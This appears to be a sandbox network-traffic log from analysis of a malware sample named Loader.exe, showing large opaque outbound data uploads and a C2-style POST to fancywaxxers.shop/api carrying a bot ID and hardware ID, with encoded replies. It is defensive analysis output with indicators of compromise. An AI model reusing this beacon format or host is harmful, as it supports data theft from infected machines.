                                                                                        2024-12-31 16:38:47 UTC15331OUTData Raw: f5 9b ca b4 83 38 76 31 21 92 19 4f 4d 38 69 2f 28 26 de f9 71 56 4c 7e 38 00 1b 49 5c 5d fd 40 90 97 c6 77 ee 20 f5 9d b6 39 af d5 95 80 fc ea 86 1b c2 54 15 73 c4 1c a2 ee 6a 2d 5c 1a 33 c2 cc 28 71 53 0a ae bb ef 26 47 06 d1 37 c5 56 d4 c7 5e 1f ac be b3 da f3 b6 5b 95 53 23 9c 1c cc 99 a5 77 ac 38 3c 0a 26 a1 7e 3e 66 78 0b 5e 7e b3 de 1f 64 f7 4b 9f 67 f8 70 9a e2 9b 46 48 2c 38 7e 47 96 df 18 97 ff de f0 a6 fd d4 c1 8a 5f e7 67 c7 52 3c 7c b5 fb bd 1f 6c fc ca e7 d5 f5 53 16 a1 77 2e 9f de 3e 82 58 71 ef 06 27 f3 92 43 e3 f4 3d 7e 46 cd 8e 3e b0 12 61 cd 99 67 3b b0 aa bc 9e ee a9 ed f2 df eb d3 bf e7 a8 dd 86 a7 6d e5 20 61 46 71 ec 27 66 74 97 dc dd b9 9e e9 f4 5f b3 69 e3 07 f3 6a aa c7 5b 45 4e b2 7e 3a 7f 50 38 e9 eb d1 d0 a8 b2 ef 31 ef e4 49
                                                                                        Data Ascii: 8v1!OM8i/(&qVL~8I\]@w 9Tsj-\3(qS&G7V^[S#w8<&~>fx^~dKgpFH,8~G_gR<|lSw.>Xq'C=~F>ag;m aFq'ft_ij[EN~:P81I
                                                                                        2024-12-31 16:38:47 UTC15331OUTData Raw: 10 f7 90 d4 a3 f3 a0 34 8e ef 94 c8 b3 f0 b4 93 a1 96 bf 44 83 e6 19 80 71 d6 3d bf a8 ea fd 7b 8d 03 92 c9 77 86 4e 91 70 f7 83 7d 5d 99 06 ba 85 73 a2 ec ef e9 9d af 72 3b d9 33 05 2d a7 87 3b 0c 54 7c 3e e5 4b f8 37 be ac 15 f8 51 5a 2d 8f 57 e3 90 f1 0c c9 3d 30 fb 8c 24 24 5c 39 bd 3c dc 32 d2 51 ae a1 6d b3 d5 ec 19 15 f8 7a 48 0c bb 0f 05 de 5b 57 c8 5d 1d 76 bc f3 b5 fc 86 5b 6e 31 c8 ad 72 eb 3b 3c 93 d1 d7 11 c0 0a 6c d2 7e 25 da 79 42 61 9e 63 3b 73 48 e1 0b 3c 2d 13 f6 9e b5 33 f5 ec a5 6a 21 2b 44 c3 75 67 7a c7 cf 3e 38 dc 96 54 ce f7 e1 fb 96 f4 e5 87 ec e4 0f d5 7a 11 4f 53 8a d8 49 83 63 5d ec ed 1f 76 5f 49 d6 d5 6d 8a bd 93 c5 23 b4 8b 8e f6 63 5d 43 b7 37 20 46 5e 21 96 f6 55 81 8e cc c0 72 5e c8 8c 0b 8c e9 66 1a e0 7b f8 76 2f 03 57
                                                                                        Data Ascii: 4Dq={wNp}]sr;3-;T|>K7QZ-W=0$$\9<2QmzH[W]v[n1r;<l~%yBac;sH<-3j!+Dugz>8TzOSIc]v_Im#c]C7 F^!Ur^f{v/W
                                                                                        2024-12-31 16:38:47 UTC15331OUTData Raw: 74 69 a4 28 03 99 15 84 29 dd ca ea 73 f1 96 11 3d 28 c3 69 0e 25 74 58 2c 61 fa 19 2b 84 ef 16 47 5f 30 e7 fa c4 54 bb 04 dc 33 aa 77 79 0b ba bd 3f bd 2e fa 7f ca c8 16 1d 14 70 d3 6b cc a9 e0 2e 1a 7c b8 f3 b2 81 0b 0c 56 39 0e db a8 bb e0 04 b7 de be f3 db fb 4e c7 dc 5f 5f d2 21 48 49 f2 b2 f7 d1 77 aa a7 28 e9 7e d8 bf f7 6a 4f 08 26 eb b1 20 86 4d 22 cc f3 ff 98 b1 bb 7b 6c 24 41 f1 08 d7 6e b4 00 d2 23 61 d9 b9 d7 02 8c cf a5 b4 94 26 34 b2 3e 34 ef 28 60 22 ee 0f d0 4e 80 d6 4f ec 2d c1 84 fa 23 54 44 5b 62 90 a2 ea 02 51 ee 28 e3 e0 88 e0 cf eb 0b fc 5e e0 f4 d5 63 c2 db bc 3f 58 2f bd 43 d2 e3 08 cb 32 71 90 2d 2c fe 0c ca ba 29 02 04 77 ef 90 3e cf 7c 74 a0 8c f5 ec 3a 84 ea 82 26 ee 2d c7 5f 23 5e c6 0b a2 e0 58 d6 91 b9 46 53 8a f2 22 1e 22
                                                                                        Data Ascii: ti()s=(i%tX,a+G_0T3wy?.pk.|V9N__!HIw(~jO& M"{l$An#a&4>4(`"NO-#TD[bQ(^c?X/C2q-,)w>|t:&-_#^XFS""
                                                                                        2024-12-31 16:38:47 UTC15331OUTData Raw: 0a 58 48 2a 87 17 bf 6c 9d 51 cc e1 f6 14 37 2f 81 2d fe 4a ec 13 74 1f df 51 5f 7b ff 47 fe 56 65 7a e8 ed d8 1d d4 cc a1 86 97 e8 04 65 ba fe 83 3d 04 9f a5 fc 13 36 8d 46 79 d6 f7 e4 a5 9d ab 99 1c 46 7b 5c 70 97 bb e5 9b d5 ea dc ec 83 4d 26 7f 25 1c c5 b6 f7 46 fb ab bd da 47 0c 98 ad 9e 52 b9 0a e1 61 f9 16 45 ed 82 e5 35 7c b7 b1 9b 28 01 d5 15 79 19 96 d8 3c 71 3e 29 ae da ce ac c9 7a b4 36 23 20 84 6b 23 fb 5f 42 2b 61 a8 ce 60 e4 4b 2c 6f 79 da a3 30 c3 38 d0 0e 4d e4 dc e0 29 f9 07 b7 15 46 48 f8 2a 6e c0 01 af b3 ab ab 56 bd d8 00 5a 14 93 0c b5 70 04 3d 54 f6 09 db f1 31 40 1f 6d 6b 4e d1 7b b9 a3 77 0c 0b c9 fd 2d 91 57 e5 b5 1c 45 dc 2b ad 0c 6c de 89 ee c9 1b 2c 06 05 74 b4 f1 7f 9f e4 40 5e b7 c0 af 5b 9a 7e 73 03 13 57 79 40 e7 2c ce c6
                                                                                        Data Ascii: XH*lQ7/-JtQ_{GVeze=6FyF{\pM&%FGRaE5|(y<q>)z6# k#_B+a`K,oy08M)FH*nVZp=T1@mkN{w-WE+l,t@^[~sWy@,
                                                                                        2024-12-31 16:38:47 UTC15331OUTData Raw: 2b 42 10 b7 11 11 8e c5 d4 f6 b2 f5 4b cd ce 68 09 55 fa 37 7f e6 f5 33 71 0d ff b0 c2 d3 a0 d4 eb 6c 24 63 cc 91 30 d7 dc 2e 0b 11 3e 85 f3 82 2c ab 8c 3e 91 1a b6 6d 90 25 67 c4 9c ef 30 0c 18 85 b3 ca 1f b8 26 6a 83 d0 c1 e7 26 32 e7 6b e5 38 42 8b f1 76 21 b3 4b b3 bb c1 50 06 8c 30 cb ae 32 e9 fe 38 56 d3 6f 08 a3 24 e1 df 2f 97 70 cb 9e a9 4e f1 38 b2 90 30 e7 f3 f6 95 04 60 3b 5c f5 56 16 a4 06 a4 ca cd 88 80 70 9f 2e 88 9e 85 63 cd 22 81 c5 17 9e 07 3a de 86 9a dd b2 bd cf fd 35 43 ce 4b 61 7b c7 79 d2 82 95 3b e7 ad 06 4a 0f af 1c 9b 61 1b 3e d3 03 1e b2 ff bc ac 2a 37 d8 45 64 d5 3d 9a 90 bb 0e 08 c8 08 18 2a 9f 12 f1 1e cd 03 21 21 60 25 71 f4 a5 6d e7 12 2b bb b3 a5 ba f1 7a d5 92 29 0a e1 75 88 bf a0 2d 9e d3 37 54 fb b1 f3 b0 4c f9 1d 6c af
                                                                                        Data Ascii: +BKhU73ql$c0.>,>m%g0&j&2k8Bv!KP028Vo$/pN80`;\Vp.c":5CKa{y;Ja>*7Ed=*!!`%qm+z)u-7TLl
                                                                                        2024-12-31 16:38:47 UTC15331OUTData Raw: 1f b7 a0 b7 3d bb 4f 77 25 c9 24 ad 39 7e bf 1a cc 5b 96 c2 f0 f7 b0 90 22 67 74 7c 89 cd 3d b2 7e 77 db 43 ec 34 7e 85 e9 b3 56 f5 41 90 c0 0e 5b 37 dd 4c 1f 5b 54 d8 5e 61 b4 c6 22 c0 ef e1 9f 2e 77 af f9 e4 08 d3 0f 7d 81 11 58 72 a7 97 ae fc e5 aa ae ef 9c 17 74 6c 81 cb 3a c9 06 50 4e 64 5c e7 a1 08 bf 99 5e 2c 98 9b cb 9f f7 77 97 83 4e c3 08 c5 ed f9 7d 50 2a 63 50 59 6f 10 09 88 45 7b f7 48 f4 06 38 28 fe 30 c4 a5 5d 02 54 a5 9d 45 36 18 08 89 50 5d 3d 61 08 af 79 32 ee d3 58 76 0c 71 b9 58 d3 03 dd 60 8c 26 49 0e 41 b8 0a 62 4d 3e 52 d2 7e 04 e6 6d 08 5f 2a 4d 3c 97 b1 72 e7 1f bf 1a a7 7f 5a fe 8c e5 bc 37 10 68 ce 56 7f 85 41 70 31 d2 6c 4a b5 9c f6 6b 28 f3 98 53 c4 18 2f 30 3c 2f 05 02 73 02 41 91 03 b8 36 ac fd 1f 44 c4 20 9a 0e 27 63 d0 f6
                                                                                        Data Ascii: =Ow%$9~["gt|=~wC4~VA[7L[T^a".w}Xrtl:PNd\^,wN}P*cPYoE{H8(0]TE6P]=ay2XvqX`&IAbM>R~m_*M<rZ7hVAp1lJk(S/0</sA6D 'c
                                                                                        2024-12-31 16:38:47 UTC15331OUTData Raw: 9e dc ed ca fa f5 22 97 72 ea 12 45 b1 f1 8c 9a 40 3e 26 c6 db 9b 51 ca e6 af a9 2c 7e 9e d0 6e 6f 58 89 78 df bc 95 86 8a 0c 90 26 f4 46 bc d1 c5 7b 01 d8 4f 74 ef fe 56 d6 a4 61 db 48 2b f9 e1 76 d9 5b 96 82 1d b9 45 76 75 d9 fc 54 f2 36 15 8e 1c 5e 55 5b 76 70 cc 36 b9 61 4a 90 8b d6 31 2a c2 90 4f ee db 90 58 5e 38 6b 96 ed cf fb 58 7d f0 21 d6 25 a2 4c dc c9 a3 f6 2a aa 49 69 40 cc d6 4c 0c 40 cb 0c d4 b6 89 e8 cf de 07 78 26 10 87 9a c5 48 5e a0 64 7a 66 ad 9f 12 e0 2f 36 91 a1 0f 50 8d 54 76 f2 b0 de 9c c5 50 55 02 c2 99 9d 3b 4b 7f 69 10 ed e2 b9 54 28 a5 c2 f0 bb f7 52 12 a4 7c a9 0a 88 70 7b 95 1e 3d 9d 3e 6e c5 c7 d7 26 41 07 5c 22 9c de eb a2 05 d6 4e cc 77 6e fc b7 c2 ee 0a 02 a3 c8 ff bb 22 a8 3c 9c df 37 f0 54 0e 60 fc 6e a8 75 95 07 7b 50
                                                                                        Data Ascii: "rE@>&Q,~noXx&F{OtVaH+v[EvuT6^U[vp6aJ1*OX^8kX}!%L*Ii@L@x&H^dzf/6PTvPU;KiT(R|p{=>n&A\"Nwn"<7T`nu{P
                                                                                        2024-12-31 16:38:47 UTC15331OUTData Raw: 28 b5 aa cf 43 ca 74 e5 64 33 a5 ab 7a ab ea d1 26 42 60 e5 ac 47 9d 13 92 23 b4 41 ad 85 c3 13 38 7b 57 6d 7a e2 d9 da 6a f5 4e f1 38 e0 a3 ac cb d5 7f 9f 3c aa a8 b1 de 71 26 a2 4b b1 e5 cf d1 34 53 08 e1 e2 be fa 62 ab 22 ab 6e e5 f9 91 ad 99 6a 53 36 79 b9 f3 84 e5 92 39 72 bf fc 80 5b f9 a6 e4 a2 19 80 1b 36 06 9d 6f e0 a6 6a 8e df ef 0f 47 c1 53 82 9d ab ee f2 52 3b 3a 91 ec 11 71 6a b2 2d 09 41 8a 85 f1 73 3f 04 d3 72 3f 2a 27 ae 4b 8c 2d a4 1f 3f a7 29 f6 15 e3 ae 49 38 2e 43 e8 96 ec bb fc 2f 36 f9 ac d6 89 53 b2 4f 7d 28 f7 e2 3a 4d 83 6d de fe b6 b8 4d c6 23 bb 4e e0 a5 6f 51 c4 18 94 d3 1b 5f bb a6 a2 84 69 85 ce 9a 6e 01 51 be 9f 23 da 2b f2 79 3b 03 db 56 46 83 e6 e2 0b 68 1d 6f d6 9b d5 fa 0d 48 67 9c d6 1e 5a 6d ce 28 a7 87 32 78 01 73 43
                                                                                        Data Ascii: (Ctd3z&B`G#A8{WmzjN8<q&K4Sb"njS6y9r[6ojGSR;:qj-As?r?*'K-?)I8.C/6SO}(:MmM#NoQ_inQ#+y;VFhoHgZm(2xsC
                                                                                        2024-12-31 16:38:48 UTC1137INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:38:48 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=9b3gq8qhe086sin1i0bg75hdl9; expires=Sat, 26 Apr 2025 10:25:27 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K0XNBn5R25oa5Lzp%2BkZUdVGhz5nwzNXQ6b06SA2vRt7d56Z2Eydy75eb%2Fd5JjDsLivFApeRvDEFHviseYdm7%2BwvrTuEWw4lDgc4JKehPTFw3IMhrz869YJ9HSTl96qIbbRPBgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb3b2186f42d2-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1596&rtt_var=602&sent=297&recv=589&lost=0&retrans=0&sent_bytes=2843&recv_bytes=573002&delivery_rate=1810291&cwnd=229&unsent_bytes=0&cid=746ebbe96d3f1aa2&ts=1641&x=0"


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.549858104.21.80.14436472C:\Users\user\Desktop\Loader.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:38:49 UTC265OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 87
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:38:49 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 35 38 30 39 32 32 34 31 30 33 26 6a 3d 26 68 77 69 64 3d 31 38 45 32 34 35 30 30 35 41 43 30 37 30 35 35 43 38 32 41 38 31 34 38 43 36 45 35 34 34 30 30
                                                                                        Data Ascii: act=get_message&ver=4.0&lid=yau6Na--5809224103&j=&hwid=18E245005AC07055C82A8148C6E54400
                                                                                        2024-12-31 16:38:49 UTC1125INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:38:49 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=f5qvl3btu58cvap5k8k9mqch1k; expires=Sat, 26 Apr 2025 10:25:28 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6H1mt7tZ3nF49A124dl0hM5GEsgfS1ZGxtCXsGJgIrG2vNdSZhAJ7Lu2iPXWUze7yccg5k1rNjwswwpH9kzqUCsXoASCbXz1qr6j6iLFgy0Dt56wcPeuKB69mzpLzH9i%2BrjNug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb3bf7aa78c0f-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1921&min_rtt=1917&rtt_var=728&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=988&delivery_rate=1494370&cwnd=223&unsent_bytes=0&cid=4da5dc5639032de2&ts=481&x=0"
                                                                                        2024-12-31 16:38:49 UTC244INData Raw: 31 33 36 62 0d 0a 56 51 77 62 55 43 51 31 4a 4b 71 64 71 2b 31 57 42 4f 52 44 76 76 4a 4f 75 75 73 62 2b 73 47 67 77 70 68 4e 52 42 41 47 56 35 67 4f 64 7a 6b 32 55 42 63 65 6d 37 47 4a 69 48 51 2b 31 57 2b 63 6c 6d 79 41 79 56 57 4c 74 76 6a 7a 79 6a 77 4d 61 43 31 38 79 7a 51 36 51 67 42 4b 5a 55 4c 6b 72 2b 4b 2f 45 6b 57 39 4e 64 72 47 43 4f 62 45 63 4d 2b 49 32 71 57 72 66 51 78 64 61 42 62 53 59 6a 56 32 44 41 74 6a 59 35 37 37 34 39 70 6a 58 70 59 7a 32 64 6b 74 67 39 4d 6f 6f 36 6e 6c 6a 39 6f 6b 66 53 4e 68 44 37 4d 47 5a 33 45 66 59 46 4e 31 79 65 54 49 72 44 78 6c 6c 77 57 48 70 79 2f 53 30 33 32 4d 71 73 32 33 39 51 6c 78 61 6a 55 74 2f 44 78 4a 53 69 64 6a 65 52 66 50 33 38 33 59 47 56 65 70 64 2f 44 4b 65 38
                                                                                        Data Ascii: 136bVQwbUCQ1JKqdq+1WBORDvvJOuusb+sGgwphNRBAGV5gOdzk2UBcem7GJiHQ+1W+clmyAyVWLtvjzyjwMaC18yzQ6QgBKZULkr+K/EkW9NdrGCObEcM+I2qWrfQxdaBbSYjV2DAtjY57749pjXpYz2dktg9Moo6nlj9okfSNhD7MGZ3EfYFN1yeTIrDxllwWHpy/S032Mqs239QlxajUt/DxJSidjeRfP383YGVepd/DKe8
                                                                                        2024-12-31 16:38:49 UTC1369INData Raw: 43 68 62 4c 6d 4f 37 49 33 73 66 7a 78 2f 66 43 33 78 48 6e 59 72 5a 6b 42 78 63 63 37 38 38 5a 34 5a 4e 4a 4d 4b 32 49 63 34 30 4a 46 79 72 61 6e 46 69 74 6b 37 42 31 4e 76 62 2f 56 6b 54 33 45 59 63 30 4a 72 33 4d 72 53 69 6a 52 4e 70 7a 72 39 72 6d 48 6a 6e 6c 48 4e 39 5a 61 52 34 43 46 7a 5a 6c 59 53 77 48 35 66 4b 79 6c 42 63 55 4c 75 2f 70 6d 30 46 32 4f 6f 42 74 6a 46 42 39 75 44 49 35 79 33 79 36 2f 74 49 41 41 6a 66 47 54 69 43 53 4e 32 41 48 56 53 44 2b 61 75 7a 61 38 77 4d 61 73 51 2b 63 59 41 67 36 6c 68 73 4c 62 6a 6a 4f 6f 36 48 43 46 55 4a 73 41 74 4a 7a 41 44 52 51 4e 39 2b 76 50 37 69 78 68 39 72 52 48 71 73 78 66 4d 6a 79 2b 57 6e 59 2b 70 72 43 49 2b 64 7a 56 6e 30 42 68 69 57 68 6c 54 52 32 62 4d 79 2b 79 43 4d 45 7a 54 64 76 66 46 50
                                                                                        Data Ascii: ChbLmO7I3sfzx/fC3xHnYrZkBxcc788Z4ZNJMK2Ic40JFyranFitk7B1Nvb/VkT3EYc0Jr3MrSijRNpzr9rmHjnlHN9ZaR4CFzZlYSwH5fKylBcULu/pm0F2OoBtjFB9uDI5y3y6/tIAAjfGTiCSN2AHVSD+auza8wMasQ+cYAg6lhsLbjjOo6HCFUJsAtJzADRQN9+vP7ixh9rRHqsxfMjy+WnY+prCI+dzVn0BhiWhlTR2bMy+yCMEzTdvfFP
                                                                                        2024-12-31 16:38:49 UTC1369INData Raw: 63 39 4f 2b 52 31 58 6b 4b 4b 55 51 74 30 69 4a 50 56 53 46 54 62 52 58 34 37 4f 4f 56 66 53 2b 33 49 6f 69 72 48 74 53 37 66 62 54 7a 36 5a 44 63 44 42 31 6d 59 6d 50 65 43 53 4e 77 5a 57 31 50 51 35 6d 74 34 36 41 34 52 61 31 78 7a 4c 41 6f 37 4b 78 30 6e 49 6d 58 39 39 49 2f 4e 48 63 74 4e 4b 46 74 50 30 49 34 59 58 68 6d 77 36 53 59 69 67 34 76 73 43 6a 55 76 51 72 63 75 6e 69 44 6f 75 47 6f 2b 54 34 43 4b 56 4d 32 38 47 31 71 62 54 74 4a 51 45 6e 75 71 4e 48 65 4c 47 43 4e 42 75 2b 46 43 66 62 59 66 72 69 6e 6c 59 33 4c 41 48 42 65 50 78 58 69 48 33 74 59 48 6c 56 43 66 4a 76 50 32 71 55 75 4c 38 38 51 33 38 51 58 36 6f 56 4c 6e 49 2b 53 69 38 6f 4a 42 55 6c 77 4d 36 77 54 55 44 51 37 45 58 78 65 7a 61 36 62 70 52 74 71 70 51 71 4d 67 41 7a 63 76 56
                                                                                        Data Ascii: c9O+R1XkKKUQt0iJPVSFTbRX47OOVfS+3IoirHtS7fbTz6ZDcDB1mYmPeCSNwZW1PQ5mt46A4Ra1xzLAo7Kx0nImX99I/NHctNKFtP0I4YXhmw6SYig4vsCjUvQrcuniDouGo+T4CKVM28G1qbTtJQEnuqNHeLGCNBu+FCfbYfrinlY3LAHBePxXiH3tYHlVCfJvP2qUuL88Q38QX6oVLnI+Si8oJBUlwM6wTUDQ7EXxeza6bpRtqpQqMgAzcvV
                                                                                        2024-12-31 16:38:49 UTC1369INData Raw: 73 36 6b 35 47 44 39 46 4d 4b 77 46 51 6c 51 53 51 67 42 6a 7a 75 58 5a 32 79 64 48 74 68 58 59 67 42 54 73 75 33 53 78 71 4f 69 34 72 47 59 33 53 6c 5a 6a 30 52 30 36 62 7a 35 6e 56 78 7a 62 70 4d 47 67 4f 55 71 46 47 73 61 63 42 76 4f 4a 62 61 4b 5a 2b 62 6a 42 45 57 73 69 4d 57 44 35 50 57 39 69 41 58 56 70 43 35 50 48 6d 4a 30 38 57 4d 73 42 31 4c 45 4c 6a 72 46 63 77 72 50 7a 67 64 73 5a 63 6b 56 42 4e 63 52 36 62 32 4e 6f 51 32 46 4b 33 38 72 42 33 6a 49 38 69 69 54 66 71 43 69 43 32 48 79 2f 68 75 61 59 6f 41 6f 4b 4a 6d 77 51 2b 78 74 6e 55 68 70 65 54 51 2f 32 73 73 2b 71 46 48 53 65 43 34 2b 4c 44 2b 2b 54 51 36 69 31 39 70 66 57 66 7a 52 34 64 68 6a 4b 46 33 67 72 46 6b 35 43 66 64 33 31 37 4e 51 50 56 70 34 43 35 49 64 35 30 6f 46 31 73 66 65
                                                                                        Data Ascii: s6k5GD9FMKwFQlQSQgBjzuXZ2ydHthXYgBTsu3SxqOi4rGY3SlZj0R06bz5nVxzbpMGgOUqFGsacBvOJbaKZ+bjBEWsiMWD5PW9iAXVpC5PHmJ08WMsB1LELjrFcwrPzgdsZckVBNcR6b2NoQ2FK38rB3jI8iiTfqCiC2Hy/huaYoAoKJmwQ+xtnUhpeTQ/2ss+qFHSeC4+LD++TQ6i19pfWfzR4dhjKF3grFk5Cfd317NQPVp4C5Id50oF1sfe
                                                                                        2024-12-31 16:38:49 UTC628INData Raw: 79 39 79 54 43 58 58 4d 32 39 35 47 6e 78 7a 45 2b 37 4a 38 5a 51 4f 66 4e 4d 6e 31 36 63 45 32 4c 63 30 69 76 4c 33 73 64 77 36 43 31 46 41 47 4f 77 58 61 58 49 61 55 33 5a 72 2b 4f 37 39 6e 6d 4d 39 72 44 72 35 68 68 62 62 6d 6b 4b 71 69 64 71 61 79 42 73 68 61 6a 34 2b 33 53 31 70 56 32 4d 50 64 6e 36 5a 31 5a 33 64 46 30 33 55 43 34 61 2f 66 76 4f 39 58 59 75 71 6b 34 6a 64 42 44 5a 5a 53 42 33 2b 4d 45 73 77 47 52 41 48 45 4d 54 76 33 71 38 6d 4d 34 30 57 39 62 64 32 33 64 31 4f 71 75 72 44 73 36 41 4d 4c 58 46 73 41 76 42 6c 57 6c 59 41 52 58 39 69 6e 36 37 2f 6d 43 35 76 6c 7a 54 53 69 42 2f 70 6e 46 79 32 6c 4f 75 50 38 69 38 6c 55 32 6c 68 33 77 4a 45 56 6d 4a 30 44 45 36 66 79 50 50 63 42 47 76 51 45 38 61 77 4f 74 61 70 63 63 2b 59 31 36 58 68
                                                                                        Data Ascii: y9yTCXXM295GnxzE+7J8ZQOfNMn16cE2Lc0ivL3sdw6C1FAGOwXaXIaU3Zr+O79nmM9rDr5hhbbmkKqidqayBshaj4+3S1pV2MPdn6Z1Z3dF03UC4a/fvO9XYuqk4jdBDZZSB3+MEswGRAHEMTv3q8mM40W9bd23d1OqurDs6AMLXFsAvBlWlYARX9in67/mC5vlzTSiB/pnFy2lOuP8i8lU2lh3wJEVmJ0DE6fyPPcBGvQE8awOtapcc+Y16Xh
                                                                                        2024-12-31 16:38:49 UTC1369INData Raw: 32 33 33 31 0d 0a 48 41 64 57 33 4e 49 43 4c 39 66 66 70 4b 54 52 42 56 33 79 68 44 7a 39 72 50 45 4a 7a 54 75 6e 59 6e 37 51 52 50 4b 42 32 31 5a 59 45 30 34 35 5a 6c 61 50 44 38 36 41 6c 4d 6e 70 49 50 66 45 45 51 33 51 61 48 57 42 76 6e 76 7a 6a 72 7a 68 63 74 53 72 36 78 7a 53 4a 6b 58 2b 51 71 4e 65 4b 71 6e 78 33 4f 30 49 45 39 58 35 75 4c 68 5a 79 56 46 53 66 79 50 72 61 4c 48 43 44 48 35 48 48 41 4f 71 44 64 4a 6d 47 78 4b 62 62 42 42 52 2b 56 6a 48 57 5a 30 4e 58 45 55 4a 73 52 73 36 70 35 61 59 69 4d 5a 49 6f 36 4d 45 2b 31 71 6c 79 76 71 33 4f 6e 72 63 49 45 53 6c 48 4f 4e 77 64 4f 32 4d 58 55 6b 52 49 77 4e 62 62 72 67 34 31 67 6a 48 45 32 51 33 34 68 57 6a 49 71 50 4b 30 2f 77 41 51 51 54 38 67 7a 54 68 4e 59 54 46 58 63 78 33 61 2b 2f 2b 34
                                                                                        Data Ascii: 2331HAdW3NICL9ffpKTRBV3yhDz9rPEJzTunYn7QRPKB21ZYE045ZlaPD86AlMnpIPfEEQ3QaHWBvnvzjrzhctSr6xzSJkX+QqNeKqnx3O0IE9X5uLhZyVFSfyPraLHCDH5HHAOqDdJmGxKbbBBR+VjHWZ0NXEUJsRs6p5aYiMZIo6ME+1qlyvq3OnrcIESlHONwdO2MXUkRIwNbbrg41gjHE2Q34hWjIqPK0/wAQQT8gzThNYTFXcx3a+/+4
                                                                                        2024-12-31 16:38:49 UTC1369INData Raw: 6e 64 69 79 72 76 6e 31 4f 4d 70 73 4b 56 2f 44 30 42 59 32 45 41 30 47 31 4a 4b 78 6c 79 44 46 58 4d 33 50 72 47 62 33 47 79 49 73 6d 37 4e 74 47 64 61 5a 53 75 35 4b 50 33 41 68 52 53 4e 7a 33 6f 59 33 68 76 42 33 4e 41 61 50 44 2b 77 5a 30 78 64 74 31 36 34 74 30 65 31 37 6b 70 30 5a 48 4b 68 63 74 6d 42 31 49 31 4d 63 45 2f 4e 58 64 6d 58 55 46 6c 36 64 48 4d 6d 52 46 6d 74 58 72 51 79 78 6a 62 68 48 4f 69 6f 76 4f 30 2f 51 77 2b 49 46 34 74 38 44 70 76 58 44 52 41 64 6d 33 36 38 2f 75 4c 47 44 61 6c 4a 6f 69 6d 4b 66 6d 78 59 37 79 6e 30 70 75 70 4f 69 46 5a 53 6d 43 70 41 6a 39 4b 4e 55 73 44 5a 2f 6d 6f 36 70 77 47 56 4a 77 45 37 59 41 50 2b 34 35 49 67 49 7a 4f 70 36 42 34 44 6c 35 41 59 38 49 48 61 57 38 39 64 48 63 51 7a 65 76 41 31 44 56 71 68
                                                                                        Data Ascii: ndiyrvn1OMpsKV/D0BY2EA0G1JKxlyDFXM3PrGb3GyIsm7NtGdaZSu5KP3AhRSNz3oY3hvB3NAaPD+wZ0xdt164t0e17kp0ZHKhctmB1I1McE/NXdmXUFl6dHMmRFmtXrQyxjbhHOiovO0/Qw+IF4t8DpvXDRAdm368/uLGDalJoimKfmxY7yn0pupOiFZSmCpAj9KNUsDZ/mo6pwGVJwE7YAP+45IgIzOp6B4Dl5AY8IHaW89dHcQzevA1DVqh
